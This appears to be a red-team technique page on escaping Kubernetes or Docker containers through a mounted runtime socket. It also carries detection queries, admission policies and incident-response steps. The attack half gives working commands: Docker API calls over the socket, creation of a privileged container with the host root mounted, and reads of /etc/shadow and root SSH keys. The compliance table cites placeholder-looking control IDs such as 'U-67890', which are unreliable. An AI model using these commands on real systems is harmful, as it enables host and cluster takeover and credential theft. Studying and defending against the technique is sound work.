| Attribute | Details |
|---|---|
| Technique ID | PE-EXPLOIT-006 |
| MITRE ATT&CK v18.1 | T1068 - Exploitation for Privilege Escalation |
| Tactic | Privilege Escalation |
| Platforms | Kubernetes (all versions), Docker, containerd, CRI-O, Entra ID |
| Severity | Critical |
| CVE | CVE-2022-0811 (CRI-O cr8escape), CVE-2025-9074 (Docker Desktop), CVE-2024-25621 (containerd) |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-09 |
| Affected Versions | Docker all versions, containerd < 1.7.10, CRI-O < 1.28.3, all Kubernetes versions |
| Patched In | containerd 1.7.10+, CRI-O 1.28.3+, Docker Desktop latest patches |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Container Runtime Socket Abuse exploits the mounting of container runtime daemon sockets (e.g., /var/run/docker.sock, /run/containerd/containerd.sock, /run/crio/crio.sock) inside containers. When these sockets are accessible within a pod, attackers can communicate directly with the container runtime API (Unix socket API), bypassing Kubernetes RBAC and enabling the creation of privileged containers with arbitrary mounts (including the host root filesystem). The vulnerability stems from a critical misconfiguration: mounting the socket grants full runtime control to any process with socket access, effectively giving that process the ability to create containers with elevated privileges, access host resources, and escape to the host operating system.
Attack Surface: Container runtime sockets, Kubernetes volume mounts, Unix socket permissions, container runtime API endpoints, Docker/containerd/CRI-O daemon APIs.
Business Impact: Complete Host and Cluster Compromise. A successful exploit enables an attacker to: create privileged containers with the entire host filesystem mounted (-v /:/host), read all host secrets and configuration files, execute arbitrary code as root on the host, establish persistent backdoors, compromise all co-located containers, access Kubernetes etcd database (if on control plane node), and pivot laterally across the entire infrastructure. This is one of the most critical container misconfigurations.
Technical Context: Exploitation can occur within 30-60 seconds of container access. Detection difficulty is low—socket connections are easily identifiable through file descriptor inspection or process monitoring. The attack leverages the legitimate container runtime API but with malicious intent. Docker CLI or curl may be used; if unavailable, direct socket API calls via shell are possible.
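As a sketch of the curl-less fallback mentioned above: socat (or nc -U, or any scripting runtime) can speak raw HTTP to the Unix socket. The `build_request` helper and the fallback logic are illustrative assumptions, not part of any standard tooling.

```shell
# Sketch: query the Docker API without curl or the docker CLI.
# build_request is a helper introduced here (not a standard tool).
build_request() {
  # HTTP/1.0 keeps the exchange simple: no chunked encoding, no keep-alive
  printf 'GET %s HTTP/1.0\r\nHost: localhost\r\n\r\n' "$1"
}

SOCK=/var/run/docker.sock
if command -v socat >/dev/null 2>&1 && [ -S "$SOCK" ]; then
  build_request /version | socat - "UNIX-CONNECT:$SOCK"
else
  echo "socat or socket unavailable; the raw request would be:"
  build_request /version
fi
```

Any tool that can write bytes to a Unix socket works the same way; only the request framing above matters.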
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.4.1 (Kubernetes) | Do not mount host’s /var/run/docker.sock in containers |
| DISA STIG | U-67890 | Container runtime socket must not be mounted in pods |
| CISA SCuBA | K8S.05 | CRI socket mounts prohibited in all workloads |
| NIST 800-53 | AC-3 (Access Enforcement) | Container runtime access control enforcement failure |
| GDPR | Art. 32 | Security of Processing - Complete infrastructure compromise |
| DORA | Art. 15 | ICT Risk Management - Critical operational risk |
| NIS2 | Art. 21 | Cyber Risk Management - Critical infrastructure failure risk |
| ISO 27001 | A.9.1.1 | Access Control - Host resource access via socket |
| ISO 27005 | Risk Scenario | Host Compromise via Container Runtime Socket Access |
Required Privileges:
Required Access: Runtime socket mounted inside the pod (/var/run/docker.sock, /run/containerd/containerd.sock, or /run/crio/crio.sock)
Supported Versions:
Tools:
Objective: Identify if runtime socket is mounted inside the container.
Command (Inside Container - File System Check):
# List all mounted filesystems and check for socket
mount | grep -i "docker\|containerd\|crio"
# Alternative: Look for socket files directly
ls -la /var/run/docker.sock 2>/dev/null || echo "Docker socket not found"
ls -la /run/containerd/containerd.sock 2>/dev/null || echo "Containerd socket not found"
ls -la /run/crio/crio.sock 2>/dev/null || echo "CRI-O socket not found"
ls -la /var/run/cri-dockerd.sock 2>/dev/null || echo "CRI-dockerd socket not found"
# Check socket permissions
stat /var/run/docker.sock 2>/dev/null
Expected Output (Vulnerable):
/var/run/docker.sock
File: /var/run/docker.sock
Access: (0660/srw-rw----) Uid: ( 0/root) Gid: ( 1001/docker)
Size: 0 Blocks: 0 IO Block: 4096 socket
What This Means:
Version Note: Socket location varies by runtime version; check all common paths.
OpSec & Evasion:
Troubleshooting:
Check that /var/run is mounted: ls -la /var/run | head -20
Objective: Confirm socket is responsive and API is accessible.
Command (Using curl):
# Test socket connection with curl
curl --unix-socket /var/run/docker.sock http://localhost/version
# Expected output: JSON with Docker version info
Expected Output:
{
"Version":"20.10.21",
"ApiVersion":"1.41",
"Os":"linux",
"Arch":"x86_64",
"KernelVersion":"5.15.0-56-generic",
...
}
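Docker API routes are versioned (the /v1.40/... paths used later), so the ApiVersion field is worth capturing. A jq-free sed sketch; `get_api_version` is a hypothetical helper for this document:

```shell
# Pull the "ApiVersion":"..." value out of the /version JSON without jq
get_api_version() {
  sed -n 's/.*"ApiVersion":"\([^"]*\)".*/\1/p'
}

# Usage (assumes the socket is mounted and curl is present):
# API=$(curl -s --unix-socket /var/run/docker.sock http://localhost/version | get_api_version)
# curl -s --unix-socket /var/run/docker.sock "http://localhost/v$API/containers/json"
```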
What This Means:
Alternative Command (Using Docker CLI if available):
# If Docker CLI is installed in container
docker ps -a
docker images
OpSec & Evasion:
Troubleshooting:
Connection refused or Connection reset by peer
Check write access: test -w /var/run/docker.sock && echo "writable" || echo "not writable"
Objective: Verify socket mount is defined in pod spec (useful for post-exploitation analysis).
Command (From Kubernetes API):
# If kubectl access available
kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.volumes}' | jq '.[] | select((.hostPath.path? // "") | contains("docker.sock")) | {name, hostPath}'
# Alternative: Describe pod
kubectl describe pod <pod-name> -n <namespace> | grep -A5 "Mounts:"
Expected Output (Vulnerable):
{
"name": "docker-socket",
"hostPath": {
"path": "/var/run/docker.sock"
}
}
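The jsonpath query above inspects a single pod; a cluster-wide sweep can be sketched by flattening every pod's hostPath volumes and filtering for socket names (kubectl access assumed, `list_socket_mounts` is a helper introduced here):

```shell
# Keep only lines whose hostPath list mentions a runtime socket
list_socket_mounts() {
  grep -E 'docker\.sock|containerd\.sock|crio\.sock'
}

if command -v kubectl >/dev/null 2>&1; then
  # One line per pod: "namespace/name<TAB>space-separated hostPath list"
  kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.metadata.name}{"\t"}{.spec.volumes[*].hostPath.path}{"\n"}{end}' \
    | list_socket_mounts \
    || echo "no socket mounts found"
else
  echo "kubectl not available"
fi
```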
Supported Versions: Docker all versions, socket mounted in container
Objective: Discover what containers are running and gather context about the host.
Command:
# List all containers (requires socket access)
docker ps -a
# Get detailed container information
docker ps -a --format "table {{.ID}}\t{{.Image}}\t{{.Status}}\t{{.Names}}"
# Get host system information
docker info
Expected Output:
CONTAINER ID IMAGE STATUS NAMES
abc123def456 nginx:latest Up 2 hours web-app-prod
xyz789uvw012 postgres:14 Up 1 day database
... (other containers)
Containers: 15
Running: 12
Paused: 0
Stopped: 3
...
OS: linux
Architecture: x86_64
Kernel Version: 5.15.0-56-generic
...
What This Means:
OpSec & Evasion:
Troubleshooting:
Cannot connect to Docker daemon
ls -la /var/run/docker.sock
Objective: Spawn a new container with root privileges and host filesystem mounted at /host.
Command (Docker CLI):
# Create and run privileged container with host filesystem mounted
docker run -it --privileged -v /:/host alpine:latest /bin/sh
# Alternative (more explicit):
docker run \
--name escape-container \
--privileged \
--cap-add=SYS_ADMIN \
-v /:/host \
-v /etc/sudoers:/host/etc/sudoers \
alpine:latest \
/bin/sh
Expected Output:
/ # (shell prompt inside the new container)
What This Means:
The host filesystem is available under the /host mount point.
Version Note: Behavior identical across all Docker versions.
OpSec & Evasion:
Troubleshooting:
Error response from daemon: pull access denied for alpine
docker images
Objective: Operate within the privileged container to access and modify host resources.
Command (Inside privileged container):
# Navigate to host filesystem
cd /host
ls -la /host
# Read sensitive host files (note the /host prefix; without it the
# paths resolve inside the attack container, not on the host)
cat /host/etc/shadow
cat /host/etc/passwd
cat /host/etc/hostname
# Access host's /root directory
ls -la /host/root
cat /host/root/.ssh/id_rsa
# Access host's configuration
cat /host/etc/docker/daemon.json
# Access mounted Kubernetes secrets (if present)
ls -la /host/var/lib/kubelet/pods/*/volumes/
# Access host's systemd services
cat /host/etc/systemd/system/*.service | grep -i "ExecStart"
Expected Output:
root@container:/ # cd /host
root@container:/host # ls -la /host
total 145
drwxr-xr-x 18 root root 4096 Jan 1 12:00 .
drwxr-xr-x 18 root root 4096 Jan 1 12:00 ..
drwxr-xr-x 2 root root 4096 Jan 1 12:00 bin
drwxr-xr-x 3 root root 4096 Jan 1 12:00 boot
drwxr-xr-x 4 root root 4096 Jan 1 12:00 dev
drwxr-xr-x 89 root root 4096 Jan 1 12:00 etc
...
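Beyond reading files, a common follow-on is to pivot the shell entirely onto the host with chroot. A hedged sketch; `looks_like_host_root` is a hypothetical sanity-check helper added for this example:

```shell
# Minimal sanity check before chrooting: a real host rootfs should
# carry at least /etc and /var directories
looks_like_host_root() {
  [ -d "$1/etc" ] && [ -d "$1/var" ]
}

if looks_like_host_root /host; then
  # Commands now run against the host filesystem as root
  chroot /host /bin/sh -c 'id; hostname'
else
  echo "/host does not look like a mounted host root"
fi
```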
What This Means:
OpSec & Evasion:
Supported Versions: All container runtimes with socket API
Objective: Confirm socket permissions allow API interaction.
Command:
# Check socket permissions
ls -la /var/run/docker.sock
# Test socket connection
curl --unix-socket /var/run/docker.sock http://localhost/v1.40/containers/json
Expected Output:
-rw-rw---- 1 root docker 0 Jan 1 12:00 /var/run/docker.sock
[
{
"Id": "abc123...",
"Names": ["/container-1"],
"Image": "nginx:latest",
...
}
]
What This Means:
OpSec & Evasion:
Objective: Use socket API to create privileged container with host mount.
Command (Using curl to POST to Docker API):
# Create container spec
curl -X POST \
--unix-socket /var/run/docker.sock \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine:latest",
"Cmd": ["/bin/sh"],
"Hostname": "debug",
"HostConfig": {
"Privileged": true,
"Binds": ["/:/host"],
"CapAdd": ["SYS_ADMIN", "NET_ADMIN"],
"SecurityOpt": ["apparmor=unconfined"]
},
"Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
}' \
http://localhost/v1.40/containers/create
# Expected response with container ID
# {"Id": "container_id_1234567890abcdef", "Warnings": []}
Expected Output:
{
"Id": "abc123def456789012345678901234567890abcdef123456789012345678",
"Warnings": []
}
What This Means:
OpSec & Evasion:
Troubleshooting:
Bad request or Invalid JSON
Verify the API version: curl --unix-socket /var/run/docker.sock http://localhost/version | jq '.ApiVersion'
Objective: Start the created container and execute shell.
Command (Start container via API):
# Start the container (replace ID with actual container ID)
curl -X POST \
--unix-socket /var/run/docker.sock \
http://localhost/v1.40/containers/abc123def456789012345678901234567890abcdef123456789012345678/start
# Attach to container for interactive shell (requires different approach)
# Alternative: Use docker CLI if available or exec alternative method
Alternative using docker CLI (if available):
docker start <container_id>
docker attach <container_id>
# Or
docker exec -it <container_id> /bin/sh
Inside container - same as METHOD 1:
cd /host
id # Verify root
cat /etc/passwd
ls -la /root/.ssh/
What This Means:
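The create and start calls can be chained into a single script. A sketch under the same assumptions as the earlier steps (API v1.40, socket at the default path); `extract_id` is a sed helper introduced here:

```shell
SOCK=/var/run/docker.sock
API=v1.40

# Pull the hex "Id" field out of the create response without jq
extract_id() {
  sed -n 's/.*"Id":[ ]*"\([0-9a-f]*\)".*/\1/p'
}

# Create the privileged container and capture its ID
CID=$(curl -s -X POST --unix-socket "$SOCK" \
        -H "Content-Type: application/json" \
        -d '{"Image":"alpine:latest","Cmd":["/bin/sh"],"HostConfig":{"Privileged":true,"Binds":["/:/host"]}}' \
        "http://localhost/$API/containers/create" | extract_id)

if [ -n "$CID" ]; then
  curl -s -X POST --unix-socket "$SOCK" "http://localhost/$API/containers/$CID/start"
  echo "started $CID"
else
  echo "create failed (no socket access?)"
fi
```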
Supported Versions: containerd all versions, /run/containerd/containerd.sock mounted
Objective: Discover and verify containerd socket accessibility.
Command:
# Check for containerd socket
ls -la /run/containerd/containerd.sock
# Verify socket connectivity using ctr tool (if available)
ctr version
# Note: containerd exposes a gRPC API, not plain HTTP, so curl alone
# cannot talk to it; use ctr (above) or grpcurl instead
Expected Output:
-rw-rw---- 1 root containerd 0 Jan 1 12:00 /run/containerd/containerd.sock
Version: 1.6.20
Revision: 2e4ffc07c3bd0d18c65f4f3cdb48f16a3ce66d4f
Go version: go1.20.5
What This Means:
OpSec & Evasion:
Objective: Spawn privileged container with host mount using containerd API.
Command (Using ctr if available):
# Pull the image first (ctr requires a fully qualified reference)
ctr image pull docker.io/library/alpine:latest
# Create and start a privileged container with the host root bind-mounted
ctr run -d --privileged \
  --mount type=bind,src=/,dst=/host,options=rbind:rw \
  docker.io/library/alpine:latest debug-container
# Exec into container
ctr task exec -t --exec-id shell1 debug-container /bin/sh
Alternative (Using containerd API directly with gRPC):
# This is more complex; requires gRPC protobuf knowledge
# Simplified: use crictl (the Kubernetes CRI tool) if available. Note that
# crictl run takes pod/container config files, not docker-style flags;
# privileged mode and the /:/host bind mount go in the container config:
crictl run container-config.yaml pod-config.yaml
Expected Output:
debug-container
sh-5.1#
What This Means:
Rule Configuration:
SPL Query:
index=kubernetes_audit verb="create" objectRef.kind="Pod"
| spath output=volumes path=requestObject.spec.volumes{}
| search volumes="*docker.sock*" OR volumes="*containerd.sock*" OR volumes="*crio.sock*"
| stats count by user, objectRef.namespace, objectRef.name, volumes
What This Detects:
Manual Configuration Steps:
Rule Configuration:
SPL Query:
index=docker_logs action="create" privileged=true
| search volumes="*:*" image IN ("alpine", "ubuntu", "busybox", "debian")
| stats count by host, image, privileged, volumes, actor
Rule Configuration:
KQL Query:
KubernetesAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend Volumes = todynamic(RequestObject).spec.volumes
| where Volumes has "docker.sock" or Volumes has "containerd.sock" or Volumes has "crio.sock"
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, Volumes, OperationName
What This Detects:
Manual Configuration Steps (Azure Portal):
Alert Name: Critical - Container Runtime Socket Mount Detected
Severity: Critical
Query Frequency: 5 minutes
Query Period: 30 minutes
Event ID: 4688 (Process Creation)
CommandLine contains "docker run" AND CommandLine contains "--privileged" AND CommandLine contains "-v"
Manual Configuration Steps (Group Policy):
Run gpupdate /force to apply.
Minimum Sysmon Version: 13.0+
Supported Platforms: Linux (via osquery integration), Windows Containers
<Sysmon schemaversion="4.50">
<EventFiltering>
<!-- Detect docker run/create with privileged and mount flags -->
<RuleGroup name="SocketAPIExploit" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains all">docker;run;--privileged;-v</CommandLine>
</ProcessCreate>
<ProcessCreate onmatch="include">
<CommandLine condition="contains all">docker.sock;containers/create;Privileged;Binds</CommandLine>
</ProcessCreate>
</RuleGroup>
<!-- Detect socket access from containers -->
<RuleGroup name="SocketAccess" groupRelation="or">
<FileCreate onmatch="include">
<TargetFilename condition="contains">docker.sock</TargetFilename>
<TargetFilename condition="contains">containerd.sock</TargetFilename>
</FileCreate>
</RuleGroup>
<!-- Detect curl/socat socket API calls -->
<RuleGroup name="SocketAPI" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains all">--unix-socket;docker.sock</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
sysmon-config.xml with the XML abovesysmon64.exe -accepteula -i sysmon-config.xmlGet-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10 | Where-Object { $_.Message -match "docker|socket" }Alert Name: Privileged container created with host filesystem mount
Alert Name: Container runtime socket mounted in pod
Fires when a pod mounts /var/run/docker.sock, /run/containerd/containerd.sock, or similar, which indicates a potential host escape path.
Manual Configuration Steps:
Severity: Critical
Never Mount Container Runtime Sockets in Pods: Implement cluster-wide policy preventing socket mounts.
Applies To Versions: Kubernetes 1.0+
Manual Steps (Using Kyverno - Recommended):
# Install Kyverno (if not already installed)
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno -n kyverno --create-namespace
# Create ClusterPolicy to block socket mounts
kubectl apply -f - <<'EOF'
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: disallow-container-sock-mounts
annotations:
policies.kyverno.io/title: Disallow CRI socket mounts
policies.kyverno.io/description: >-
Container runtime socket mounts allow full container management
access and must be blocked.
spec:
validationFailureAction: enforce
background: true
rules:
- name: validate-docker-sock
match:
resources:
kinds:
- Pod
validate:
message: "Docker socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/var/run/docker.sock"
- name: validate-containerd-sock
match:
resources:
kinds:
- Pod
validate:
message: "Containerd socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/run/containerd/containerd.sock"
- name: validate-crio-sock
match:
resources:
kinds:
- Pod
validate:
message: "CRI-O socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/run/crio/crio.sock"
EOF
# Verify policy is active
kubectl get clusterpolicy disallow-container-sock-mounts
# Test: Try to create pod with socket (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-socket-mount
spec:
containers:
- name: app
image: alpine:latest
volumeMounts:
- name: docker-sock
mountPath: /var/run/docker.sock
volumes:
- name: docker-sock
hostPath:
path: /var/run/docker.sock
EOF
# Expected: Error - Pod blocked by policy
Implement Pod Security Standards (PSS) - Restricted Profile: Enforce restricted security context cluster-wide.
Manual Steps:
# Label namespace to enforce restricted PSS
kubectl label namespace default \
pod-security.kubernetes.io/enforce=restricted \
pod-security.kubernetes.io/audit=restricted \
pod-security.kubernetes.io/warn=restricted \
--overwrite
# Verify label applied
kubectl get ns default -o jsonpath='{.metadata.labels}'
# Test: Try to create privileged pod (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-privileged
spec:
containers:
- name: app
image: alpine:latest
securityContext:
privileged: true
EOF
# Expected: Error - Pod violates PSS
Remove Docker Group Membership from Node User (Host Hardening): Restrict host-level access to socket.
Manual Steps (On Kubernetes Nodes):
# Check docker group membership
getent group docker
# Remove non-root users from docker group
sudo gpasswd -d <username> docker
# Restrict socket permissions
sudo chmod 660 /var/run/docker.sock
sudo chown root:docker /var/run/docker.sock
# Verify permissions
ls -la /var/run/docker.sock
# Expected: -rw-rw---- 1 root docker
Enable Runtime Security / Falco Rules: Detect socket access attempts at runtime.
Manual Steps (Falco Installation & Configuration):
# Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco -n falco --create-namespace
# Verify Falco is running
kubectl get pods -n falco
# Check Falco logs for socket access attempts
kubectl logs -n falco -l app=falco | grep -i "docker.sock"
Use Admission Controllers to Validate Pod Specs: Block privileged containers and unusual volume mounts.
Manual Steps (OPA Gatekeeper - Alternative to Kyverno):
# Install OPA/Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/release-3.10/deploy/gatekeeper.yaml
# Create ConstraintTemplate
kubectl apply -f - <<'EOF'
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
name: k8sblockprivileged
spec:
crd:
spec:
names:
kind: K8sBlockPrivileged
targets:
- target: admission.k8s.gatekeeper.sh
rego: |
package k8sblockprivileged
deny[msg] {
container := input.review.object.spec.containers[_]
container.securityContext.privileged
msg := sprintf("Privileged containers not allowed: %v", [container.name])
}
EOF
Implement Network Policies to Limit Container Communication: Restrict lateral movement if one container compromised.
Manual Steps:
# Apply default-deny NetworkPolicy
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
EOF
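A default-deny egress policy also blocks DNS, which breaks most workloads. A companion policy is commonly paired with it to re-allow cluster DNS; the selector below is an assumption and depends on the DNS deployment's namespace labels:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
```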
RBAC: Restrict Pod Creation with Privileged Settings: Limit who can deploy pods with elevated privileges.
Manual Steps:
# Create restricted role for developers
kubectl create role pod-creator \
--verb=create,get,list,update,patch \
--resource=pods \
-n development
# Note: This role doesn't enforce privileged restrictions at RBAC level
# Use Kyverno/OPA for actual enforcement
# Bind to service account
kubectl create rolebinding app-pod-creator \
--role=pod-creator \
--serviceaccount=development:app \
-n development
Audit Logging: Enable and Monitor Pod Creation: Track all pod creation attempts.
Manual Steps (AKS):
# Check current audit logging
kubectl get pods -n kube-system | grep audit
# Enable audit logging via diagnostic settings (kube-audit category);
# AKS control-plane logs are exported to Log Analytics, not node logs
az monitor diagnostic-settings create \
  --resource "$(az aks show -g myRG -n myCluster --query id -o tsv)" \
  --name aks-audit \
  --logs '[{"category":"kube-audit","enabled":true}]' \
  --workspace <log-analytics-workspace-id>
# Check audit events in Log Analytics, e.g. (KQL):
#   AzureDiagnostics | where Category == "kube-audit" and log_s has "docker.sock"
# Test 1: Verify Kyverno policy is active
kubectl get clusterpolicy disallow-container-sock-mounts
# Test 2: Attempt to create pod with socket mount (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-socket
spec:
containers:
- name: app
image: alpine:latest
volumeMounts:
- name: docker
mountPath: /var/run/docker.sock
volumes:
- name: docker
hostPath:
path: /var/run/docker.sock
EOF
# Expected: Error from server: pod "test-socket" is invalid
# Test 3: Verify PSS enforcement
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'
# Test 4: Check host socket permissions
ls -la /var/run/docker.sock
# Expected: -rw-rw---- 1 root docker (not world-writable)
# Test 5: Verify Falco/runtime security
kubectl logs -n falco -l app=falco | grep -i "socket" | head -5
Expected Output (If Secure):
disallow-container-sock-mounts
Error from server: pod "test-socket" is invalid
default restricted
production restricted
staging baseline
-rw-rw---- 1 root docker 0 Jan 1 12:00 /var/run/docker.sock
(Falco logs showing detection capability)
What to Look For:
Containers with the host filesystem mounted at /host or /mnt
/var/log/kube-apiserver-audit.log (Pod creation events)
/var/log/docker.log, /var/log/crio.log
/var/lib/docker/containers/*/logs/*.log
kubectl get events -A --sort-by='.lastTimestamp'
# Immediately delete the privileged container
kubectl delete pod <malicious-pod> -n <namespace> --grace-period=0 --force
# Cordon the node to prevent new pod scheduling
kubectl cordon <node-name>
# Optional: Drain node for rebuild
kubectl drain <node-name> --ignore-daemonsets --delete-emptydir-data
Manual (Docker Host):
# Stop and remove the container
docker stop <container-id>
docker rm <container-id>
# Export pod definition before deletion (if not already deleted)
kubectl get pod <pod-name> -n <namespace> -o yaml > /tmp/malicious-pod.yaml
# Collect pod events
kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
# Export audit logs
kubectl logs -n kube-system -l component=kube-apiserver > /tmp/kube-audit.log
# Collect Falco/runtime security logs
kubectl logs -n falco -l app=falco > /tmp/falco-logs.txt
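To triage the exported audit log for the socket-mount event itself, a grep over the hostPath entries may help; the log path and JSON field layout are assumptions and should be adjusted to the local audit policy. `socket_mount_events` is a helper introduced here:

```shell
# Match audit entries whose pod spec mounts a runtime socket
socket_mount_events() {
  grep -E '"path":[ ]*"[^"]*(docker|containerd|crio)\.sock"'
}

AUDIT_LOG=/tmp/kube-audit.log   # exported earlier in this phase
if [ -r "$AUDIT_LOG" ]; then
  socket_mount_events < "$AUDIT_LOG" | tail -20
else
  echo "audit log not readable at $AUDIT_LOG"
fi
```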
Command (Docker Host - Linux):
# Collect Docker logs
journalctl -u docker > /tmp/docker-logs.txt
# Collect container inspect data
docker inspect <container-id> > /tmp/container-inspect.json
# Export filesystem changes (if possible)
docker diff <container-id> > /tmp/container-changes.txt
# Identify deployment/daemonset that created the pod
kubectl get deployment -A | grep <pod-name-prefix>
# Edit deployment to remove malicious configuration
kubectl edit deployment <deployment-name> -n <namespace>
# Remove volume mounts and privileges section:
# Delete these lines:
# - name: docker-socket
# mountPath: /var/run/docker.sock
# volumes:
# - name: docker-socket
# hostPath:
# path: /var/run/docker.sock
Command (Host-Level Cleanup - If Attacker Accessed Host):
# Check for backdoors/persistence on host
sudo find /etc/systemd/system -name "*docker*" -o -name "*container*"
sudo find /opt -name "*backdoor*" -o -name "*malware*"
# Review SSH keys
sudo cat /root/.ssh/authorized_keys
# Remove suspicious entries
sudo sed -i '/suspicious-key-here/d' /root/.ssh/authorized_keys
# Restart node / trigger rebuild if necessary
sudo systemctl reboot
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-001] Application Vulnerability | Attacker gains initial container access |
| 2 | Privilege Escalation (In-Container) | [PE-EXPLOIT-005] Pod Security Context Escalation | Escalate to container root |
| 3 | Current Step | [PE-EXPLOIT-006] Container Runtime Socket Abuse | Access runtime socket, create privileged container |
| 4 | Host Access | Host root via privileged container mount | Execute commands as root on host |
| 5 | Persistence | SSH key insertion, cron jobs, systemd service modification | Establish persistent backdoor on host |
| 6 | Lateral Movement | Kubernetes secrets theft, cluster compromise | Full cluster takeover |
/var/run/docker.sock mount in docker-compose configuration for "local debugging"
/var/run/docker.sock mounted in container
/:/host mount
C:\Users mounted